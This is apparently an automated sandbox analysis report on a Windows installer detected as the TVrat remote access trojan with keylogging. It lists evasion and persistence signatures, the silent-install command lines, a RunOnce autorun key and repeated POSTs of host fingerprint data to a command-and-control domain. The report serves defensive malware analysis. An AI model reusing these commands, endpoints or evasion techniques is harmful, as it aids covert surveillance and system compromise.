Windows Analysis Report
aeyh21MAtA.exe

Overview

General Information

Sample name: aeyh21MAtA.exe
renamed because original name is a hash value
Original sample name: 21bc348816742321a937e95b1a4b6a57d285c143cc920a2e95c236467123e56f.exe
Analysis ID: 1558736
MD5: 91444fbf43fbbb75b12dc51f3b5465ea
SHA1: 1c81094998d5afa6c09ebd3ee14c4d99b56d729f
SHA256: 21bc348816742321a937e95b1a4b6a57d285c143cc920a2e95c236467123e56f
Tags: crypto-st--artexeuser-JAMESWT_MHT
Infos:

Detection

TVrat
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for submitted file
Yara detected TVrat
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect virtualization through RDTSC time measurements
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries keyboard layouts
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • aeyh21MAtA.exe (PID: 4820 cmdline: "C:\Users\user\Desktop\aeyh21MAtA.exe" MD5: 91444FBF43FBBB75B12DC51F3B5465EA)
    • aeyh21MAtA.tmp (PID: 4320 cmdline: "C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp" /SL5="$20454,6701859,404480,C:\Users\user\Desktop\aeyh21MAtA.exe" MD5: 7862449E145C354D01526B0F8FB3C283)
      • aeyh21MAtA.exe (PID: 940 cmdline: "C:\Users\user\Desktop\aeyh21MAtA.exe" /verysilent /password=lzueuxc MD5: 91444FBF43FBBB75B12DC51F3B5465EA)
        • aeyh21MAtA.tmp (PID: 3176 cmdline: "C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp" /SL5="$20464,6701859,404480,C:\Users\user\Desktop\aeyh21MAtA.exe" /verysilent /password=lzueuxc MD5: 7862449E145C354D01526B0F8FB3C283)
          • cmd.exe (PID: 2300 cmdline: "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\u7i3kw\9vsl3c.bat"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 1816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • xcopy.exe (PID: 5252 cmdline: xcopy /Y /I /S "C:\Users\user\AppData\Local\Temp\u7i3kw\*" "C:\Users\user\AppData\Roaming\template\" MD5: 7E9B7CE496D09F70C072930940F9F02C)
            • ast.exe (PID: 3380 cmdline: "C:\Users\user\AppData\Roaming\template\ast.exe" MD5: 8002D9E5851728EB024B398CF19DE390)
  • ast.exe (PID: 5408 cmdline: "C:\Users\user\AppData\Roaming\template\ast.exe" MD5: 8002D9E5851728EB024B398CF19DE390)
  • ast.exe (PID: 4672 cmdline: "C:\Users\user\AppData\Roaming\template\ast.exe" MD5: 8002D9E5851728EB024B398CF19DE390)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\template\ast.exe | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
C:\Users\user\AppData\Roaming\template\ast.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\Users\user\AppData\Roaming\template\ast.exe | JoeSecurity_TVrat | Yara detected TVrat | Joe Security |
C:\Users\user\AppData\Local\Temp\u7i3kw\is-TBGHD.tmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
C:\Users\user\AppData\Local\Temp\u7i3kw\is-TBGHD.tmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
Source | Rule | Description | Author | Strings
0000000A.00000000.2712015799.0000000000401000.00000020.00000001.01000000.0000000B.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
0000000A.00000000.2712015799.0000000000401000.00000020.00000001.01000000.0000000B.sdmp | JoeSecurity_TVrat | Yara detected TVrat | Joe Security |
Process Memory Space: ast.exe PID: 3380 | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
Process Memory Space: ast.exe PID: 3380 | JoeSecurity_TVrat | Yara detected TVrat | Joe Security |
Source | Rule | Description | Author | Strings
10.0.ast.exe.400000.0.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
10.0.ast.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
10.0.ast.exe.400000.0.unpack | JoeSecurity_TVrat | Yara detected TVrat | Joe Security |
                          Source: Registry Key set Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\template\ast.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\template\ast.exe, ProcessId: 3380, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ast
                          No Suricata rule has matched

                          AV Detection
                          Source: aeyh21MAtA.exe Avira: detected
                          Source: aeyh21MAtA.exe ReversingLabs: Detection: 36%
                          Source: Yara match File source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 0000000A.00000000.2712015799.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara match File source: Process Memory Space: ast.exe PID: 3380, type: MEMORYSTR
                          Source: Yara match File source: C:\Users\user\AppData\Roaming\template\ast.exe, type: DROPPED
                          Source: Yara match File source: C:\Users\user\AppData\Local\Temp\u7i3kw\is-TBGHD.tmp, type: DROPPED
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe Code function: 10_2_6B778010 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,10_2_6B778010
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe Code function: 10_2_6B7920A0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,10_2_6B7920A0
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe Code function: 11_2_07004ED6 CryptStringToBinaryA,CryptStringToBinaryA,11_2_07004ED6
                          Source: ast.exe, 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_a26e66f5-e
                          Source: aeyh21MAtA.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                          Source: unknown HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49977 version: TLS 1.2
                          Source: Binary string: vcruntime140.i386.pdb source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710833061.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3384892485.000000006CC81000.00000020.00000001.01000000.00000014.sdmp
                          Source: Binary string: vcruntime140.i386.pdbGCTL source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710833061.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3384892485.000000006CC81000.00000020.00000001.01000000.00000014.sdmp
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libcrypto-1_1.pdb source: xcopy.exe, 00000008.00000003.2447777452.000000000325D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3372819038.000000006BE10000.00000002.00000001.01000000.00000013.sdmp, is-E6DJ2.tmp.4.dr
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\libjpeg-turbo-win.pdb! source: xcopy.exe, 00000008.00000003.2453881956.00000000030AD000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: vcomp140.i386.pdbGCTL source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710762218.0000000003089000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: msvcr120.i386.pdb source: xcopy.exe, 00000008.00000003.2454654792.0000000003089000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\CFILES\Projects\WinSSL\openssl-1.1.0g\libcrypto-1_1.pdb source: xcopy.exe, 00000008.00000003.2449507358.0000000003272000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstClient.pdbe source: ast.exe, 0000000A.00000002.3386730194.000000006CEF3000.00000002.00000001.01000000.0000000E.sdmp
                          Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2u-x32\out32dll\ssleay32.pdb source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2u-x32\out32dll\ssleay32.pdb@W source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstRct.pdb source: xcopy.exe, 00000008.00000003.2446543838.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3377655988.000000006C1AF000.00000002.00000001.01000000.00000010.sdmp, is-SNDPS.tmp.4.dr
                          Source: Binary string: D:\Projects\Delphi\_Assistant\10_FSTEK_02\00_Bin\Hatls.pdb source: xcopy.exe, 00000008.00000003.2446944142.0000000003273000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3383625621.000000006C462000.00000002.00000001.01000000.0000000F.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\libjpeg-turbo-win.pdb source: xcopy.exe, 00000008.00000003.2453881956.00000000030AD000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libssl-1_1.pdb@@ source: xcopy.exe, 00000008.00000003.2454146070.00000000030A9000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3368070607.000000006BBB1000.00000002.00000001.01000000.00000012.sdmp
                          Source: Binary string: vcomp140.i386.pdb source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710762218.0000000003089000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\Projects\Delphi\_Assistant\10_FSTEK_02\00_Bin\Hatls.pdbf source: xcopy.exe, 00000008.00000003.2446944142.0000000003273000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3383625621.000000006C462000.00000002.00000001.01000000.0000000F.sdmp
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libssl-1_1.pdb source: xcopy.exe, 00000008.00000003.2454146070.00000000030A9000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3368070607.000000006BBB1000.00000002.00000001.01000000.00000012.sdmp
                          Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: ast.exe, 0000000A.00000002.3372819038.000000006BDA7000.00000002.00000001.01000000.00000013.sdmp, is-E6DJ2.tmp.4.dr
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstClient.pdb source: ast.exe, 0000000A.00000002.3386730194.000000006CEF3000.00000002.00000001.01000000.0000000E.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstRct.pdbM6 source: xcopy.exe, 00000008.00000003.2446543838.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3377655988.000000006C1AF000.00000002.00000001.01000000.00000010.sdmp, is-SNDPS.tmp.4.dr
                          Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASMOpenSSL 1.1.1l 24 Aug 2021built on: Tue Sep 7 07:24:19 2021 UTCplatform: VC-WIN32OPENSSLDIR: "C:\Program Files (x86)\Common Files\SSL"ENGINESDIR: "C:\Program Files (x86)\OpenSSL\lib\engines-1_1"not availabledes(long) source: ast.exe, 0000000A.00000002.3372819038.000000006BDA7000.00000002.00000001.01000000.00000013.sdmp, is-E6DJ2.tmp.4.dr
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe Code function: 11_3_070025DB FindFirstFileA,FindNextFileA,FindClose,11_3_070025DB
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe Code function: 11_2_070025DB lstrcat,FindFirstFileA,lstrcat,FindNextFileA,FindClose,11_2_070025DB
                          Source: global traffic TCP traffic: 192.168.2.5:49983 -> 212.193.169.65:44335
                          Source: global traffic HTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1 Host: id.xn--80akicokc0aablc.xn--p1ai:443 Content-Length: 269
                          Source: global traffic HTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1 Host: id.xn--80akicokc0aablc.xn--p1ai:443 Content-Length: 269 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.19045) x64
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 2691M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.19045) x64
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: Joe Sandbox View JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
                          Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe Code function: 10_2_6B7A09F0 recv,send,WSAGetLastError,10_2_6B7A09F0
                          Source: global traffic DNS traffic detected: DNS query: id.xn--80akicokc0aablc.xn--p1ai
                          Source: unknown HTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1 Host: id.xn--80akicokc0aablc.xn--p1ai:443 Content-Length: 269
                          Source: xcopy.exe, 00000008.00000003.2447777452.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2443348648.0000000003271000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446543838.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454146070.0000000003089000.00000004.00000020.00020000.00000000.sdmp, is-E6DJ2.tmp.4.dr, is-SNDPS.tmp.4.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446543838.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446944142.0000000003269000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2453881956.00000000030AD000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2449507358.00000000032C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446543838.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446944142.0000000003269000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2453881956.00000000030AD000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2449507358.00000000032C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                          Source: ast.exe, 0000000A.00000003.3264857508.0000000005D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.
                          Source: ast.exe, 0000000A.00000003.2783003987.0000000005D56000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2783003987.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2943967677.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3029895127.0000000005D5D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2953188361.0000000005D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr6alphasslca2023.crl0G
                          Source: ast.exe, 0000000A.00000003.3029895127.0000000005D63000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2783003987.0000000005D56000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2943967677.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3029895127.0000000005D5D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3264857508.0000000005D65000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2953188361.0000000005D5E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3318115880.0000000005D67000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3288736833.0000000005D64000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2943481219.0000000005DC7000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3340187350.0000000005D60000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3266592381.0000000000DF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2447777452.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2443348648.0000000003271000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446543838.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455052025.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454146070.0000000003089000.00000004.00000020.00020000.00000000.sdmp, is-E6DJ2.tmp.4.dr, is-SNDPS.tmp.4.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                          Source: xcopy.exe, 00000008.00000003.2447777452.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2443348648.0000000003271000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446543838.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455052025.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454146070.0000000003089000.00000004.00000020.00020000.00000000.sdmp, is-E6DJ2.tmp.4.dr, is-SNDPS.tmp.4.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2447777452.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2443348648.0000000003271000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446543838.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455052025.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454146070.0000000003089000.00000004.00000020.00020000.00000000.sdmp, is-E6DJ2.tmp.4.dr, is-SNDPS.tmp.4.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                          Source: xcopy.exe, 00000008.00000003.2447777452.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2443348648.0000000003271000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446543838.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455052025.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454146070.0000000003089000.00000004.00000020.00020000.00000000.sdmp, is-E6DJ2.tmp.4.dr, is-SNDPS.tmp.4.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                          Source: ast.exe, 0000000C.00000002.2942134917.0000000002BD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446543838.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2447777452.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446944142.0000000003269000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2443348648.0000000003271000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446543838.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454146070.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2453881956.00000000030AD000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2449507358.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, is-E6DJ2.tmp.4.dr, is-SNDPS.tmp.4.drString found in binary or memory: http://ocsp.comodoca.com0
